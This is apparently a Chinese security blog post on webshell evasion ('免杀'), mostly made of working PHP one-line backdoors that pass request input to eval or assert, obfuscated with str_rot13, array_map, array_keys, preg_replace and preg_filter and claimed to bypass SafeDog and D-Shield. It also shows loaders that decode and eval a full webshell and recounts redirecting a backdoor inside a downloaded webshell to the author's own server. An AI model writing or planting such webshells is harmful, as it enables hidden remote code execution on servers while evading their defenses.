shell 免杀aspx_Webshell免杀
一句话木马
在渗透测试中最常用的就是一句话后门(小马)和中国菜刀的配合。如果出现某种WAF防护,就寻找一个免杀的大马挂马。
最常见的php一句话木马<?php @eval($_POST['x']);?>
这个一句话木马由两部分组成,eval用来执行接收的代码。$_POST['x']来接收数值。
本着这个原则,尝试改写一句话木马绕过WAF。
搜集了几个常用的php函数
执行代码的eval、assert、preg_replace
接收数据的$_POST、$_GET、$_REQUEST
php一句话免杀
str_rot13函数<?php
$c=str_rot13('nffreg');
$c($_REQUEST['x']);
?>
str_rot13函数来替代assert。该函数对字符串执行ROT13编码。ROT13编码就是把每个字母在字母表中移动13位。
测试发现无法绕过安全狗。修改一下。<?php
function xiaoma($a){
$c=str_rot13('nffreg');
$c($a);
}
xiaoma($_REQUEST['x']);
?>
即可绕过安全狗。<?php
class One{
function xiaoma($x){
$c=str_rot13('n!ff!re!nffreg');
$str=explode('!',$c)[3];
$str($x);
}
}
$test=new One();
$test->xiaoma($_REQUEST['x']);
?>
再次修改,加了explode函数分割字符串,class封装类。可绕过D盾。
array_map函数
array_map() 函数将函数作用到数组中的每个值上,并返回一个新的数组。<?php
$a1=array("1234","123456");
$a2=array(@$_REQUEST['x'],"1234");
$a=array_map(null,$a1,$a2)[0][1];
assert($a);
?>
即可绕过安全狗。
array_key函数
array_key() 函数也是返回包含数组的一个新数组。<?php
$a=array($_REQUEST['x']=>"3");
$b=array_keys($a)[0];
eval($b);
?>
索引数组变化为关联数组。
即可绕过安全狗、D盾。
preg_replace函数
用来正则匹配的一个函数。<?php
function func(){
return $_REQUEST['x'];
}
preg_replace("/test/e",func(),"i am test");
?>
/e用来当做php代码解析。5.6版本以下实用。
测试可绕过安全狗和D盾。
preg_filter函数
根据preg_replace修改为preg_filter函数,也是用来执行正则的匹配替换。<?php
$a=preg_filter('/\s+/','','as s er t');
$a($_REQUEST['x']);
?>
也可以绕过D盾、安全狗。
其他<?php
function test($a){
$arr = array('a','s','s','e','r','t');
$func = '';
for($i=0;$i
$func.=$func.$arr[$i];
}
$func=substr($func,-6);
$func($a);
}
test($_REQUEST['x']);
?>
也可以绕过D盾、安全狗。
php免杀大马
正好自己手里有一个php大马。但不免杀。尝试将源码base64加密后修改为php免杀大马。
将大马eval函数变为exit或者echo。burp抓取源代码。
将源代码拷贝下来,审计发现给源码存在一处后门。
base64解码一下
哦!!!真是可以。
将该base64地址修改为自己的vps地址。嘻嘻。
那现在只要eval函数可以执行这传base64的字符串就可以啦。
WAF对base64_encode、base64_decode查杀非常严格。
不断搜索、修改、编写,最终成功。<?php
header("Content-type: text/html; charset=utf-8");
class one{
public function dama(){
$l='base';
$o='64_de';
$v='co';
$e='de';
$love=$l.$o.$v.$e;
$c="love";
$shellname='网站安全检测';
$password='xxx';
$myurl='http://www.xxx.com';
$a=$$c('code');//php源码
@eval($a);
}
}
$person = new one;
$person->dama();
?>
直接将php大马源码放在code处。即可。
也可以改造php免杀一句话木马。
比如这款<?php
header("Content-type: text/html; charset=utf-8");
function test($code){
$password='xxx';
$a=preg_filter('/\s+/','','base 64 _ deco de');
$c=$a($code);
@eval($c);
}
$code='';//code存放php大马
test($code);
?>
访问一下。
查看vps是否接收到。
参考资料:
关注我们
我是Tide安全团队的CSeroad,对web安全感兴趣的小伙伴可以关注或加入我们。Tide安全团队http://www.tidesec.net/
shell 免杀aspx_Webshell免杀相关推荐
- shell 免杀aspx_webshell免杀套路
0x01 前言 尽最大努力在一文中让大家掌握一些有用的WEBSHELL免杀技巧 0x02 目录关于eval 与 assert 字符串变形 定义函数绕过 回调函数 回调函数变形 特殊字符干扰 数组 类 ...
- 远控免杀4---Evasion免杀
0x01 免杀能力一览表 1.下表中标识 √ 说明相应杀毒软件未检测出病毒,也就是代表了Bypass. 2.为了更好的对比效果,大部分测试payload均使用msf的windows/meterpert ...
- Atitit.木马 病毒 免杀 技术 360免杀 杀毒软件免杀 原理与原则 attilax 总结...
Atitit.木马 病毒 免杀 技术 360免杀 杀毒软件免杀 原理与原则 attilax 总结 1. ,免杀技术的用途2 1.1. 病毒木马的编写2 1.2. 软件保护所用的加密产品(比如壳)中,有 ...
- 远控免杀专题(17)-Python-Rootkit免杀(VT免杀率7/69)
声明:文中所涉及的技术.思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 本专题文章导航 1.远控免杀专题(1)-基础篇:https://mp.w ...
- 远控免杀5---Veil免杀
0x01 免杀能力一览表 1.下表中标识 √ 说明相应杀毒软件未检测出病毒,也就是代表了Bypass. 2.为了更好的对比效果,大部分测试payload均使用msf的windows/meterpert ...
- 远控免杀专题(9)-Avet免杀(VT免杀率14/71)
本专题文章导航 1.远控免杀专题(1)-基础篇:https://mp.weixin.qq.com/s/3LZ_cj2gDC1bQATxqBfweg 2.远控免杀专题(2)-msfvenom隐藏的参数: ...
- 远控免杀专题(16)-Unicorn免杀(VT免杀率29/56)
声明:文中所涉及的技术.思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 本专题文章导航 1.远控免杀专题(1)-基础篇:https://mp.w ...
- 远控免杀专题(12)-Green-Hat-Suite免杀(VT免杀率23/70)
声明:文中所涉及的技术.思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 本专题文章导航 1.远控免杀专题(1)-基础篇:https://mp.w ...
- 远控免杀专题(13)-zirikatu免杀(VT免杀率39/71)
声明:文中所涉及的技术.思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 本专题文章导航 1.远控免杀专题(1)-基础篇:https://mp.w ...
最新文章
- linux+bin+写入引导区,CentOS 6.4 U盘启动盘制作、安装及遇到的问题解决
- Swift基础--调用第三方OC项目
- 教育园报修系统_【务实活动】“充电”模式强力开启,务实幼教2019暑期小红巾生存教育大培训...
- matlab运行容量小,可变大小(运行时)输入Simulink Matlab
- linux多进程条件变量,Linux 多线程条件变量同步
- linux端口监听命令
- raid卡组不同raid_RAID 类型介绍
- 解决: service endpoint with name xxx already exists
- php 白名单,php实现ip白名单黑名单功能
- JEP 379:将低暂停时间的垃圾收集器Shenandoah推向生产
- WIN10安装VMware的管理员权限问题
- [高通SDM450][Android9.0]CTA认证--拆分申请权限分组
- 代币标准--ERC721协议源码解析
- 频谱细化-----Zoom-FFT算法介绍及MATLAB实现
- oracle 远程连接配置
- 总结下花了大约半年的时间从零开始的unity游戏开发(1)
- 《我学区块链》—— 二、一些概念和工具
- 苹果7防水吗_苹果手机防水是真的吗?事实很残酷,但还可以抢救一下
- IPC(网络摄像机)介绍
- PHP获取谷歌邮箱的邮件附件imap